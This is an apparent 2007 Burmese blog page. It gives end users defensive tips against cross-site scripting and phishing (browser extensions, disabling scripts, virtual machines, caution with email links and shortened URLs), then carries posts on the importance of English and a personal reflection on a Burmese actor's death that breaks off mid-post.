XSS သို႕မဟုတ္ Cross-Site Scripting ရန္မွ ကာကြယ္မႈကို ေဆာင္ရြက္သည့္အခါ Web Developer မ်ားဘက္မွ ၄င္းတို႕၏ Web Site ကို XSS ေပ်ာ့ကြက္မ်ား ျဖစ္ေပၚမလာေအာင္ လိုအပ္ေသာ အကာအကြယ္မ်ားဖန္တီးျခင္း၊ User မ်ားမွ ထည့္သြင္းလိုက္ေသာ အခ်က္အလက္မ်ားကို စိစစ္ လက္ခံျခင္း အစရွိသည့္ ေဆာင္ရြက္မႈမ်ားကို ျပဳလုပ္ရသည္။ ထိုအပိုင္းကို ခ်န္ထားခဲ့ျပီး အင္တာနက္ သံုးသူတစ္ဦး အေနျဖင့္ XSS အႏၱရာယ္မွ မည္သို႕ အကာအကြယ္ျပဳရမည္၊ ေရွာင္တိမ္းရမည္ကို အဓိက ေဖာ္ျပသြားမည္ ျဖစ္သည္ -

၁. အင္တာနက္ၾကည့္ေဆာ့ဖ္၀ဲ ေရြးခ်ယ္ျခင္း
အင္တာနက္ထဲတြင္ေလွ်ာက္သြားစဥ္ မိမိအတြက္ လံုျခံဳမႈရွိေစရန္ အကာအကြယ္ဖန္တီးသည့္အခါ တစ္ခုတည္းေသာ အေရးအၾကီးဆံုး အရာမွာ မိမိအသံုးျပဳမည့္ အင္တာနက္ၾကည့္ေဆာ့ဖ္၀ဲကို ေရြးခ်ယ္ျခင္း ျဖစ္သည္။ အင္တာနက္ သံုးသူ အမ်ားစုသည္ အမ်ားအားျဖင့္ အင္တာနက္ၾကည့္ေဆာ့ဖ္၀ဲ တစ္ခုထက္ ပို၍ အသံုးျပဳေလ့ရွိၾကျပီး Website တစ္ခုကို ၾကည့္သည့္အခါ ေဆာ့ဖ္၀ဲ တစ္ခုျဖင့္ အဆင္မေျပလွ်င္ ေနာက္တစ္ခုျဖင့္ ေျပာင္းသံုးေလ့ ရွိၾကသည္။ ေဆာ့ဖ္၀ဲ ေရြးခ်ယ္သည့္အခါ သတိထားရမည့္ အခ်က္တစ္ခုမွာ - တိုက္ခိုက္မႈမ်ားသည္ အင္တာနက္သံုးေနသူ အမ်ားစုကို ပစ္မွတ္ထားသည္ - ဟူေသာ အခ်က္ ျဖစ္သည္။ လတ္တေလာ အေျခအေနတြင္ Firefox ေဆာ့ဖ္၀ဲမွာ လူသံုးမ်ားသည့္ ေဆာ့ဖ္၀ဲမ်ားထဲတြင္ “ ပိုမို လံုျခံဳေသာ ” အေနအထား တြင္ရွိျပီး၊ တိုက္ခိုက္သူမ်ား၏ အဓိက ပစ္မွတ္မွာ မိုကၠရိုေဆာ့ဖ္၏ Internet Explorer ျဖစ္ေနသည္။ ထို႕ျပင္ Mozilla, Netscape, Opera, ႏွင့္ Safari တို႕ကိုလည္း ေရြးခ်ယ္ အသံုးျပဳႏိုင္ေသးသည္။

-စိတ္ခ်စြာ အသံုးျပဳႏိုင္မည့္ အင္တာနက္ၾကည့္ ေဆာ့ဖ္၀ဲ တစ္ခု (သို႕) ႏွစ္ခုကို ေရြးပါ။


၂. အင္တာနက္ၾကည့္ေဆာ့ဖ္၀ဲ ကို ပိုမိုလံုျခံဳေအာင္ ဖန္တီးျခင္း
မည္သည့္ အင္တာနက္ၾကည့္ေဆာ့ဖ္၀ဲ ကိုေရြးခ်ယ္ အသံုးျပဳသည္ျဖစ္ေစ ၄င္းတို႕ အတြက္ အကာအကြယ္ေပးမည့္ ပရိုဂရမ္မ်ား ႏွင့္ ကိရိယာ (Tools) မ်ားကို ထပ္မံေပါင္းစပ္ေပးျခင္းျဖင့္ အင္တာနက္ၾကည့္ ေဆာ့ဖ္၀ဲကို ပိုမို လံုျခံဳလာေအာင္ ဖန္တီးႏိုင္သည္။

  • Firefox အတြက္ - NoScript , SafeHistory, SafeCache,
  • Internet Explorer အတြက္ - eBay Toolbar
  • Firefox/Internet Explorer ႏွစ္မ်ဳိးလံုးအတြက္ Netcraft Anti-Phishing Toolbar, Google Toolbar စသည္တို႕မွာ -
လံုျခံဳမႈကိုမ်ားစြာ အေထာက္အပံ့ေပးႏိုင္သည့္ ကိရိယာမ်ား ျဖစ္ၾကသည္။
၄င္းတို႕သည္ သီးျခား ထည့္သြင္းေပးရသည့္ ပရိုဂရမ္မ်ား (Add-ons) မ်ားျဖစ္ျပီး -
  • Phishing web site မ်ားကို ေဖာ္ထုတ္ေပးျခင္း၊
  • web site မ်ား၏ အခ်ဳိ႕ေသာ အဂၤါရပ္မ်ား (Features)ကို ရပ္တန္႕ေပးထားျခင္း၊
  • အင္တာနက္သံုးသူမ်ား၏ စကား၀ွက္ စသည္မ်ားကို မသက္ဆိုင္သူမ်ား လက္ထဲသို႕ မေရာက္ေအာင္ ထိန္းသိမ္းကာကြယ္ေပးျခင္းႏွင့္
  • အျခားေသာ အသံုး၀င္သည့္ အကာအကြယ္ အမ်ဳိးမ်ဳိးကို ရရွိေစသည္။
Phishing - အီးေမးလ္ ကိုအသံုးျပဳျပီး အင္တာနက္သံုးသူတစ္ဦးကို အင္တာနက္ေနရာ( Web site) အတု တစ္ခုသို႕ ေရာက္လာေအာင္ဖန္တီးကာ credit card, social security, bank စာရင္းအမွတ္ စသည့္ အေရးၾကီးေသာ အခ်က္အလက္မ်ားကို လွည့္ဖ်ားရယူသည့္ အင္တာနက္ ရာဇ၀တ္မႈ တစ္မ်ဳိး။
      1. NoScript - https://addons.mozilla.org/firefox/722/
      2. SafeHistory - www.safehistory.com/
      3. SafeCache - www.safecache.com/
      4. Netcraft Anti-Phishing Toolbar -http://toolbar.netcraft.com/
      5. eBay Toolbar -http://pages.ebay.com/ebay_toolbar/
      6. Google Toolbar - www.google.com/tools/firefox/toolbar/index.html

-လိုအပ္ေသာ ပရိုဂရမ္မ်ား ႏွင့္ ကိရိယာမ်ား ထပ္မံေပါင္းထည့္ေပးပါ။



၃. အခ်ဳိ႕ေသာ အဂၤါရပ္မ်ားကို ရပ္တန္႕ထားျခင္း
အရိုးစင္းဆံုးေျပာရလွ်င္ အဂၤါရပ္ (Features) အခ်ဳိ႕ကိုသာ အလုပ္လုပ္ေစျခင္းသည္ အင္တာနက္ထဲတြင္ သြားလာရသည့္အခါ ပိုမို စိတ္ခ် လံုျခံဳသည့္ အေနအထားကို ျဖစ္ေပၚေစသည္။ ေျပာရလွ်င္ JavaScript, Java, Active X, JScript, VBScript,Flash, ႏွင့္ QuickTime တို႕အားလံုးမွာ အႏၱရာယ္ေပးႏိုင္သည့္ အရာမ်ား ျဖစ္သည္။ ၄င္းနည္းပညာမ်ားသည္ အင္တာနက္လူဆိုးမ်ားအတြက္ လက္နက္ပံုစံသစ္မ်ား ျဖစ္လာ ၾကသည္။ မေကာင္းေသာ အခ်က္တစ္ခုမွာ အဆိုပါ အဂၤါရပ္မ်ားကို အလုပ္မလုပ္ႏိုင္ေအာင္ ရပ္တန္႔ထား ျခင္းသည္ အခ်ဳိ႕ေသာ Web site မ်ား၏ အလုပ္လုပ္မႈ အေနအထားကို ရပ္တန္႕ေစျခင္း၊ တ၀က္တပ်က္သာ အလုပ္လုပ္ေစျခင္း စသည္တို႕ ျဖစ္ေပၚလာေစႏိုင္သည္။
မည္သို႕ပင္ ျဖစ္ေစ ၄င္းတို႕ကိုရပ္တန္႕ထားျခင္းက ပို၍ အက်ဳိးမ်ားေစသည္။ ထို႕ေၾကာင့္ အခ်ဳိ႕ေသာ အင္တာနက္ၾကည့္ေဆာ့ဖ္၀ဲမ်ား ႏွင့္ ၄င္းတို႕၏ ေနာက္ဆက္တြဲမ်ား (Extensions) သည္ အထက္တြင္ေဖာ္ျပခဲ့သည့္ အဂၤါရပ္မ်ားကို လိုအပ္သလို ဖြင့္/ပိတ္ျခင္းမ်ားကို အလ်င္ အျမန္ ေဆာင္ရြက္ေပးႏိုင္ ေအာင္ဖန္တီးထားျခင္းျဖစ္သည္။

-အႏၱရာယ္ေပးႏိုင္ေသာ အခ်ဳိ႕အရာမ်ား (JavaScript, Java, Active X, JScript, VBScript, Flash, ႏွင့္ QuickTime) ကို မျဖစ္မေန လိုအပ္မွသာ အလုပ္လုပ္ပါေစ။ မလိုအပ္က ရပ္ထားပါ။


၄. ကြန္ပ်ဳတာ စက္အတု (Virtual Machine) တစ္ခုကို သံုးျခင္း
ယခုအခါ ကြန္ပ်ဳတာ စက္အတု (Virtual Machine) ကဲ့သို႕ေသာ အတုဖန္တီးထားသည့္ ေနရာမ်ားမွတဆင့္ အင္တာနက္ကို အသံုးျပဳေနသူမ်ား တေန႕ထက္တေန႕ တိုးတက္ မ်ားျပားလာေနျပီ ျဖစ္သည္။ အကယ္၍ အေျခအေန တစ္ခုခု ထူးျခားမႈျဖစ္ေပၚလာပါက စက္အတုထဲတြင္သာ ျပႆနာ တက္မည္ျဖစ္ျပီး ပင္မ ကြန္ပ်ဳတာကို ထိခိုက္မႈ မရွိႏိုင္ေပ။
ကြန္ပ်ဳတာ စက္အတု (Virtual Machine) - တကယ့္ ကြန္ပ်ဳတာတစ္လံုးကဲ့သို႕ အလုပ္လုပ္ေပးႏိုင္ေသာ ကြန္ပ်ုဳတာ ေဆာ့ဖ္၀ဲတစ္မ်ဳိး၊ Operating System တစ္ခု ထည့္သြင္းတပ္ဆင္ေပးရသည္။ အျခားေသာ ေဆာ့ဖ္၀ဲမ်ားလည္း ထည့္သြင္းႏိုင္သည္။
-မိမိအကၽြမ္းတ၀င္မရွိေသာ Web site မ်ား၊ ေဆာ့ဖ္၀ဲမ်ားကို စမ္းသပ္ အသံုးျပဳရသည့္အခါ ေဘးကင္းေစရန္ အတြက္ ကြန္ပ်ဳတာ စက္အတု (Virtual Machine) ကို အသံုးျပဳပါ။


၅. အီးေမးလ္ အတြင္းရွိ အင္တာနက္ လိပ္စာမ်ားကို ဘယ္ေတာ့မွ ကလစ္မလုပ္ပါႏွင့္
အီးေမးလ္အတြင္းပါ၀င္လာသည့္ -
  • လိပ္စာႏွင့္ အင္တာနက္ေနရာမ်ား၊
  • ရုပ္ပံုမ်ား ကို တတ္ႏိုင္သမွ် မည္သည့္ အခ်ိန္တြင္မွ ကလစ္မလုပ္ပါႏွင့္။
  • ၄င္းလိပ္စာမ်ားသည္ပင္ အႏၱရာယ္ျဖစ္ေနျပီး၊
  • Phishing အီးေမလ္မ်ားကို ရွာေဖြ ေဖာ္ထုတ္ႏိုင္ရန္မွာလည္းခက္ခဲသည္။
အကယ္၍ အီးေမးလ္တစ္ေစာင္သည္ အစစ္အမွန္ျဖစ္ေၾကာင္း မေသခ်ာပါက၊ ေဆာင္ရြက္ႏိုင္သည့္ အေကာင္းဆံုးနည္းမွာ ေပးထားေသာ လိပ္စာကို အင္တာနက္ၾကည့္ေဆာ့ဖ္၀ဲ၏ လိပ္စာေဖၚျပသည့္ေနရာတြင္ ကိုယ္တိုင္ရုိက္ျပီး ထည့္သြင္းျခင္းျဖစ္သည္။ ဤနည္းအားျဖင့္ မိမိေရာက္သြားမည့္ေနရာသည္ အစစ္အမွန္ေနရာတစ္ခု ျဖစ္ေၾကာင္း အေတာ္အတန္ အာမခံခ်က္ ရရွိႏိုင္ေပသည္။

ခြ်င္းခ်က္ တစ္ခုေတာ့ ထားရွိရမည္ ျဖစ္သည္။
ဥပမာအားျဖင့္ မိမိ၏လုပ္ေဆာင္မႈ တစ္ခုကို တုုန္႕ျပန္ေပးရန္ ခ်က္ခ်င္း ေပးပို႕လာေသာ အီးေမးလ္မ်ား
(Web site တစ္ခုတြင္ မွတ္ပံုတင္ျခင္း၊ စကား၀ွက္ ေမ့သြားျခင္း ေၾကာင့္ ျပန္ေတာင္းျခင္း/ျပန္ျပင္ျခင္း၊ ကုန္၀ယ္အမွာစာ အတည္ျပဳျခင္း .. စသည္) ကို မိနစ္ပိုင္းအတြင္း ျပန္လည္ တုန္႕ျပန္ ေဆာင္ရြက္ေပးရသည့္ အခါမ်ဳိး အတြက္ ျဖစ္သည္။
-မိမိ၏ လိုအပ္ခ်က္ေၾကာင့္ ခ်က္ခ်င္းေရာက္လာျပီး ခ်က္ခ်င္းတုန္႕ျပန္ေပးရမည့္ အီးေမးလ္မ်ားအတြင္းရွိ လိပ္စာမ်ားမွ အပ၊ အျခားမည္သည့္ အီးေမးလ္မ်ားအတြင္းရွိ လိပ္စာမ်ား၊ ပံုမ်ား ကိုမဆို ကလစ္ မလုပ္ပါႏွင့္။


၆. မိမိ၏ Web mail ကို ကာကြယ္ထားပါ
လူသန္းေပါင္းမ်ားစြာတို႕သည္ နည္းအမ်ဳိးမ်ဳိးျဖင့္ Web mail မ်ားကို အသံုးျပဳလ်က္ ရွိေနၾကသည္။ ၄င္းကို မိမိ၏ ဘဏ္စာရင္း နံပါတ္ ထက္ပင္ လွ်ဳိ၀ွက္ သိမ္းဆည္းထားသင့္ေပသည္။ လူေပါင္းမ်ားစြာတို႕သည္ အေရးၾကီးေသာ အင္တာနက္ ေပၚမွ Account မ်ားကို Web mail လိပ္စာ တစ္ခုတည္းျဖင့္ ရယူ သိမ္းဆည္း ထားတတ္ေလ့ရွိၾကသည္။ အကယ္၍ တစ္စံုတစ္ေယာက္က မိမိ၏ အီးေမးလ္လိပ္စာကို နည္းလမ္းတစ္ခုခုျဖင့္ အသံုးျပဳႏိုင္သြားမည္ဆိုပါက ထိုသူသည္ ၄င္းအီးေမးလ္တြင္ ခ်ိတ္ဆက္ထားေသာ အျခားေသာ Account မ်ားကိုပါ သံုးခြင့္ရသြားမည္ ျဖစ္သည္။

သင့္အေနျဖင့္ ေဆာင္ရြက္ႏိုင္သည့္ အေကာင္းဆံုးအရာတစ္ခုမွာ -
  • အလြယ္တကူ မခန္႕မွန္းႏိုင္ေသာ စကား၀ွက္မ်ဳိးကို အသံုးျပဳျခင္း၊
  • စကား၀ွက္မ်ားကို အနည္းဆံုး ၃ လတစ္ၾကိမ္ ေျပာင္းလဲျခင္း၊
  • ၄င္းစကား၀ွက္ကို အျခားမည္သည့္ေနရာတြင္မွ မသံုးျခင္း၊
  • အလုပ္အမ်ဳိးမ်ဳိးအတြက္ အီးေမးလ္ လိပ္စာ အဆင့္အတန္းအမ်ဳိးမ်ဳိးထားရွိ အသံုးျပဳျခင္း တို႕ ျဖစ္သည္။
အေရးၾကီးေသာ အခ်က္အလက္မ်ားပါ၀င္ေနသည့္ မည္သည့္ အီးေမးလ္ကိုမဆို ဖတ္ရႈျပီးသည့္အခါ ဖ်က္ဆီးပစ္လိုက္ျခင္း သည္လည္း ေကာင္းမြန္ေသာ လုပ္ေဆာင္ခ်က္ တစ္ခု ျဖစ္သည္။
-မိမိ၏ အီးေမးလ္ စကား၀ွက္ ကို ေကာင္းစြာ ကာကြယ္ထားပါ။ အေရးၾကီးေသာ အေၾကာင္းအရာမ်ားကို အီးေမးလ္ Inbox ထဲတြင္ သိမ္းမထားပါႏွင့္။ အမ်ားႏွင့္ သက္ဆိုင္ေသာ၊ လူမ်ားစုအတြက္ ခ်ေပးရမည့္ အီးေမးလ္လိပ္စာကို အျခား အေရးၾကီးေသာ ေနရာမ်ားတြင္ မသံုးပါႏွင့္။


၇. ရွည္လ်ားေသာ အင္တာနက္လိပ္စာမ်ားကို သတိထားပါ
အကယ္၍ အင္တာနက္လိပ္စာ တစ္ခုသည္ စာေၾကာင္း တစ္ေၾကာင္းထက္ပိုမိုိုရွည္လ်ားျပီး၊ ရာခိုင္ႏႈန္း သေကၤတမ်ား % ျဖင့္ ေျပာင္းလဲ ေဖာ္ျပထားပါက အထူးသတိျပဳသင့္သည္။ အကယ္၍ အင္တာနက္လိပ္စာ တစ္ခု၏ သဘာ၀ အမွန္ကို မသိပါက ၄င္းတို႕ကို မူရင္း သေကၤတ အျဖစ္ ျပန္ေျပာင္းျပီး အတြင္းတြင္ HTML သေကၤတမ်ား ပါ၀င္ေနျခင္း ရွိမရွိ စစ္ေဆးပါ။

-HTML သေကၤတမ်ား ပါ၀င္ေနပါက ၄င္းလိပ္စာကို ကလစ္မလုပ္ပါႏွင့္။


၈. URL အတိုခ်ဳံးေပးေသာ ၀န္ေဆာင္မႈမ်ား
URL အတိုခ်ဳံးေပးေသာ ၀န္ေဆာင္မႈမ်ားကို သတိထားပါ။ အခ်ဳိ႕ေသာ အင္တာနက္လူဆိုးမ်ားသည္ မိမိတို႕၏ ေကာက္က်စ္ေသာ အင္တာနက္လိပ္စာမ်ားကို ကြယ္၀ွက္ႏိုင္ရန္အတြက္ TinyURL, snipURL, notlong, shorl, ႏွင့္ doiop တို႕ကဲ့သို႕ေသာ အင္တာနက္လိပ္စာ ေျပာင္းေပးသည့္ ၀န္ေဆာင္မႈမ်ားကို သံုးေလ့ရွိၾကသည္။ ထိုကဲ့သို႕ေသာ လိပ္စာမ်ားကို စစ္ေဆးႏိုင္ရန္အတြက္ လိုအပ္ပါက Command Line ထဲတြင္ ရိုက္ထည့္ျပီး တိုက္ရိုက္ စစ္ေဆး ၾကည့္ႏိုင္သည္။ အကယ္၍ လိပ္စာ အစစ္အမွန္ျဖစ္ပါက အမွန္အတိုင္းလမ္းညႊန္မည္ ျဖစ္သည္။ ယခုကဲ့သို႕ လိပ္စာေျပာင္းေပးေသာ ၀န္ေဆာင္မႈမ်ားသည္လည္း ၄င္းတို႕ထံေရာက္လာေသာ လိပ္စာ မွန္မမွန္ကို အာမခံႏိုင္မည္ မဟုတ္ေပ။
-ထို႕ေၾကာင့္ မည္သည့္ ေနရာကိုမဆို ကလစ္ လုပ္ေတာ့မည္ဆိုပါက အထူးသတိထားရန္လိုမည္ ျဖစ္ေပသည္။ မသိေသာ၊ သံသယရွိေနေသာ လိပ္စာမ်ားကို ကလစ္မလုပ္ပါႏွင့္။


သတိျပဳေစလိုသည္မွာ - ယခုေဖာ္ျပထားေသာ အခ်က္မ်ား သည္လည္း မိမိတို႕ကို အေတာ္အသင့္ မွ်သာ အကာအကြယ္ေပးႏိုင္မည္ျဖစ္ျပီး ရာႏႈန္းျပည့္ အကာအကြယ္ ေပးႏိုင္မႈအတြက္ သက္ဆိုင္သူ တစ္ဦးခ်င္းစီ အေနျဖင့္ အျမဲမျပတ္ ဆက္လက္ ေလ့လာသြားရန္ အထူးပင္ အေရးၾကီးလွပါေၾကာင္း -


REF -
- http://en.wikipedia.org/wiki/Xss
- http://www.cgisecurity.com/articles/xss-faq.shtml
- XSS Attacks - CROSS SITE SCRIPTING EXPLOITS AND DEFENSE by Syngress

Jul 21, 2007

အဂၤလိပ္စာ အေရးၾကီးပံု - Importance of English


ခ်င္းတြင္းမဂၢဇင္းထဲကပါပဲ ေနာက္ထပ္တစ္ပုဒ္ဖတ္မိတာကေတာ့ အထူးေဆာင္းပါးအေနနဲ႕ ေဖာ္ျပထားတဲ့ ေဒါက္တာေဒၚျမင့္ျမင့္ခင္ရဲ႕ ေဆာင္းပါး တစ္ပုဒ္ပါ ...
ႏွစ္သက္မိတာနဲ႕ အမွ် ရင္ထဲမွာပါ ထိရွခံစားမိရတာမို႕ ေရာင္းရင္း ေတြကို ထပ္ဆင့္ ေ၀မွ်လိုက္ပါတယ္ ...

အဂၤလိပ္စာတတ္ဖို႕က သိပ္အေရးၾကီးတယ္။
ဒီအဆိုဟာ အၾကိမ္ၾကိမ္အဖန္ဖန္ တဖြဖြေျပာေနေတာ့ ၾကားရတဲ့သူသာ နားျငီးသြားမယ္၊ ေလးနက္မႈကေတာ့ ေလ်ာ့မသြားဘူး။ ေနာင္တစ္ေခတ္ တစ္ခါမွာ အျခားဘာသာက အဂၤလိပ္ရဲ႕ ေနရာကို ယူသြားမွာ ျဖစ္ႏိုင္ေပမယ့္ အခုမ်က္ေမွာက္အတြက္ေတာ့ အဂၤလိပ္သာလွ်င္ ကမၻာမွာ မင္းမူေနတဲ့ စကားပဲလို႕ ဆိုရမယ္။ ဒီေတာ့ အျပိဳင္အဆိုင္ ေလာကျဖစ္တဲ့ ဂလိုဘယ္လိုက္ေဇးရွင္း ၾကိဳး၀ိုင္းထဲ ၀င္ခ်င္လွ်င္ေတာ့ ျပည္သူျပည္သားေတြဟာ အဂၤလိပ္စာကို ေကာင္းေကာင္းပိုင္ရေတာ့မယ္။

သိပၸံပညာတတ္ဖို႕ရာမွာလည္း ဒီလိုပါပဲ အဂၤလိပ္စာ မတတ္သူ (တဲ့တိုင္းျပည္) ဟာ ေနာက္လိုက္ တိုင္းျပည္ပဲ ျဖစ္ေတာ့မယ္။ ျမန္မာဟာ တစ္ခါက အိႏၵိယ၊ မေလးရွား၊ စကၤာပူ၊ ေဟာင္ေကာင္တို႕လို အဂၤလိပ္စာမွာ အဆင့္ျမင့္ခဲ့ေပမည့္ အခုေတာ့ ဒီလိုမဟုတ္ေတာ့ပါဘူး၊ အရင္က အဂၤလိပ္စာ အဆင့္မျမင့္လွတဲ့ အိမ္နီးခ်င္းႏိုင္ငံေတြထက္ ေနာက္က်ေနလို႕ မီေအာင္ မနည္းလိုက္ယူရမွာ။

အခု အသက္ ၇၀ ေက်ာ္ ၈၀ နီးပါး ပညာတတ္ေတြလို အဂၤလိပ္စာအဆင့္
အခုလူအမ်ားရွိရင္ အင္မတန္ေကာင္းမွာ။ ဒါလည္း အခ်ိန္တို အတြင္းမွာ ျဖစ္လာႏိုင္ပါတယ္။
ဆရာမၾကီး ေျပာတဲ့ စကားေလးေတြက အားလံုးကို ၾကိဳးစားၾကဖို႕ တိုက္တြန္းေနတာပါ။
ဒီေနရာမွာ ကၽြန္ေတာ့္ရဲ႕ အျမင္ေလးကို ျဖည့္စြက္ ခ်င္ပါေသးတယ္ ....
လူပုဂၢိဳလ္ တစ္ဦး တစ္ေယာက္ ၊ သူတတ္ခ်င္တဲ့ ပညာေတြတတ္လာဖို႕ ဆိုတဲ့ေနရာမွာ အဓိက အေရးအၾကီးဆံုး အခ်က္ကေတာ့ အဲဒီ - ပညာေတြကို ေလ့လာဆည္းပူး တတ္ေျမာက္ခ်င္တဲ့ စိတ္ကေလးကို မိမိအေနနဲ႕ ဘယ္လို အေျခအေနမ်ဳိးမွာ ေရာက္ေနပါေစ၊ ရင္ထဲကေန ေပ်ာက္ပ်က္မသြားေအာင္ ထိန္းသိမ္း ေမြးျမဴသြားမယ္ - ဆိုရင္ လိုခ်င္တဲ့ ပညာေတြကို အခ်ိန္တစ္ခု ၾကာတဲ့ အခါမွာ အမွန္တကယ္ သင္ယူရရွိ ႏိုင္လာတယ္ - ဆိုတာေလးပါပဲ ...

ရည္ညႊန္း
- သိပၸံပညာ အဆင့္ျမင့္ေရးႏွင့္ သိပၸံပညာတတ္မ်ား ျပဳစုပ်ဳိးေထာင္ေပးေရး - ေဆာင္းပါး
- ေဒါက္တာ ေဒၚျမင့္ျမင့္ခင္
- ခ်င္းတြင္းမဂၢဇင္း ၊ အမွတ္(၁၉)၊ ၾသဂုတ္ ၂၀၀၇ - စာ(၁၀၀-၁၀၉)

သိျခင္း၊ ေ၀ငွျခင္း၊ က်င့္ျခင္း


ကၽြန္ေတာ္ ကြန္ပ်ဳတာနား မကပ္ႏိုင္ျဖစ္ေနေသာေၾကာင့္ အေၾကာင္းအရာ အသစ္မတင္ျဖစ္ခဲ့ပါ ....
လာေရာက္လည္ပတ္ေနၾက ေရာင္းရင္း၊ သူငယ္ခ်င္းမ်ားကို အထူးပင္ အားနာမိပါသည္ ....

သို႕ေသာ္လည္း ရသမွ်အခ်ိန္ေတြမွာ စာအုပ္ေတြေတာ့ ဖတ္ျဖစ္ေနသည့္အတြက္ ....
ေရးလက္စ တပိုင္းတစမ်ားကို လက္စမသတ္ႏိုင္မီ ႏွစ္သက္မိေသာ အေၾကာင္းအရာအခ်ဳိ႕ကို
ေဖာက္သည္ခ် ေ၀ငွလိုက္ပါသည္ ....

  • တာ၀န္သိေသာ တစ္ဦးခ်င္းကို ေရွ႕တန္းတင္ေသာ ၀ါဒ၊
  • သန္႕ရွင္းေသာ လူ႕ဆက္ဆံေရး၊
  • လူထုကို ကိုယ္စားျပဳေသာ ဒီမိုကေရစီ၊
  • လူ႕ယဥ္ေက်းမႈၾကီးကို အားလံုးပါ၀င္ တည္ေထာင္ျခင္း -- ယင္းအရာအားလံုးကို ကၽြန္ေတာ္တို႕ မလိမၼာက မလုပ္ႏိုင္။
ပထမ - ျဖစ္တန္ရာကို သာမန္အသိျဖင့္ သိရမည္။
ဒုတိယ - ဗဟုသုတကို ေ၀ငွလ်က္ အျခားသူမ်ားလည္း သိေအာင္ လုပ္ရမည္။
တတိယ - သိသည့္ေလ်ာ္စြာ က်င့္ရမည္။

Responsible individualism, healthy human relationships, representative democracy, an inclusive approach toward civilization _ all of these are impossible if we are unable, frist, to invoke our common sense of what is probable, second, to do so with others as part of our shared knowledge, and third, to act accordingly.

John R Saul

ခ်င္းတြင္းမဂၢဇင္း ၊ အမွတ္(၁၉)၊ ၾသဂုတ္ ၂၀၀၇ - စာ(၅)

Jul 12, 2007

မေသခင္ဘာလုပ္ၾကမလဲ - (ကိုသားၾကီး အမွတ္တရ)


ဒီေန႕ သတင္းစာမွာ ကၽြန္ေတာ္တို႕ ခ်စ္တဲ့ သရုပ္ေဆာင္တစ္ဦးျဖစ္တဲ့ ကိုသားၾကီး (ေဒြး) ရဲ႕နာေရးသတင္း ဖတ္လိုက္ရတယ္ ....

ေၾသာ္ ... တစ္ေယာက္ေတာ႕ သြားရွာျပန္ျပီ ...
လို႕ေတြးလိုက္မိရင္း ... ဘယ္လိုေသတာလဲ လို႕ေမးၾကည့္လိုက္ေတာ့ ဦးေႏွာက္ေသြးေၾကာျပတ္တာလို႕ တစ္ေယာက္က ေျပာေနတာ ၾကားလိုက္ရတယ္ ...
တစ္ဆက္တည္းမွာဘဲ ေကာင္းတာေပါ့ ေ၀ဒနာ မခံစားလိုက္ရေတာ့ဘူးေပါ့ ...
ဆိုတဲ့ အသံတစ္သံပါ ထပ္ျပီး ၾကားမိလိုက္တယ္ ....

ကၽြန္ေတာ္ကေတာ့ အဲဒီလိုမေတြးမိလိုက္ဘူး ...
ကိုသားၾကီးတစ္ေယာက္ ေကာင္းရာသုဂတိလားပါေစ
လို႕ ဆုေတာင္းေပးလိုက္မိရင္း ...
အေသမွ ေျဖာင့္သြားရဲ႕လား ကိုသားၾကီးတစ္ေယာက္ ..
လို႕ ကိုယ့္ဘာသာကို ျပန္ေမးေနမိတယ္ ....
ဦးေႏွာက္ေသြးေၾကာျပတ္ျပီး ေသဆံုးသြားရုိးသာမွန္ကန္ခဲ့ရင္ သူ႕ခမ်ာ ေသမယ္ဆိုတာ ၾကိဳသိမွာမဟုတ္လိုက္ဘူး .. ၾကိဳတင္ျပင္ဆင္ခ်ိန္ ရလိုက္မွာ မဟုတ္ဘူးလို႕လည္း ေတြးလိုက္မိပါတယ္ ... (ရခ်င္လည္းရမွာေပါ့ေနာ္ ... )

တကယ္ေတာ့ ဒီလမ္းဟာ ကၽြန္ေတာ္တို႕ အားလံုး
တစ္ေန႕မွာ သြားကိုသြားၾကရမယ့္ ခရီးလမ္းတစ္ခုလည္း ျဖစ္ပါတယ္ ...
ဘယ္သူမဆို တစ္ေန႕ငါေသရမယ္ဆိုတဲ့ အေတြး ရွိတတ္ၾကေပမယ့္ အမ်ားစုကေတာ့ ေလာေလာဆယ္ေတာ့ ငါမေသႏိုင္ေသးပါဘူးေလ ဆိုတဲ့ အေတြးေလးကေတာ့ တဆက္တည္း ေတြးမိတတ္ၾကတာပါပဲ ... အဲလိုေတြးမိတဲ့ေနာက္မွာ အေတြးလမ္းေၾကာင္းက ေနာက္တစ္ေနရာကို ေရြ႕သြားတတ္ၾကပါတယ္ ....

ကၽြန္ေတာ္လည္း ဒီ - တစ္ေန႕ေသရမယ္ဆိုတဲ့ ကိစၥကို မၾကာခဏ ေတြးမိတတ္ပါတယ္ ... အဲဒီလိုေတြးမိလိုက္တဲ့ အခါတိုင္း အရင္ဆံုးေမးမိတာကေတာ႕ ငါဘာေတြလုပ္ျပီးျပီလဲ ေသဖို႕အတြက္ေရာ ... အဆင္သင့္ျဖစ္ေနျပီလား ... မိသားစုအတြက္၊ တိုင္းျပည္အတြက္၊ ဘာသာ သာသနာအတြက္ တတ္စြမ္းသေလာက္ ဘာေတြလုပ္ခဲ့ျပီလဲ အဲဒီလို အေတြးေတြက အလိုလို၀င္၀င္လာတတ္ပါတယ္ ... တကယ္တမ္းမွာ ဘာတစ္ခုမွ ဟုတ္တိပတ္တိ တာ၀န္မေက်ေသးသလို ခံစားရမိတယ္ ...

မိဘအေပၚမွာ အတိုင္းအတာတစ္ခုအထိ တာ၀န္ေက်ခဲ့ျပီျဖစ္ေပမယ့္ မိဘေတြ အိုမင္းမစြမ္း ျဖစ္လာခ်ိန္မွာ လိုအပ္တာမွန္သမွ် မလစ္ဟင္းရေအာင္ ျဖည့္ဆည္းေပးႏိုင္ဖို႕ ကၽြန္ေတာ့္မွာ အဆင္သင့္ မျဖစ္ေသးပါဘူး ... ကိုယ္တိုင္ေတာင္ လူတန္းေစ့ရုံေလး ရပ္တည္ေနႏိုင္ရုံပဲ ရွိပါေသးတယ္ ... တကိုယ္ေရမို႕ ဒီေလာက္ ရပ္တည္ေနႏိုင္တာပါ ... ကိုယ္ခ်စ္တဲ့ မိန္းကေလး တစ္ေယာက္ကို အတူေနထုိင္ၾကဖို႕ ကမ္းလွမ္းႏိုင္ဖို႕ဆိုတာ အေတာ္ေလး ေ၀းပါေသးတယ္ ...

ဒါဆိုရင္တိုင္းျပည္အတြက္ေရာ ...
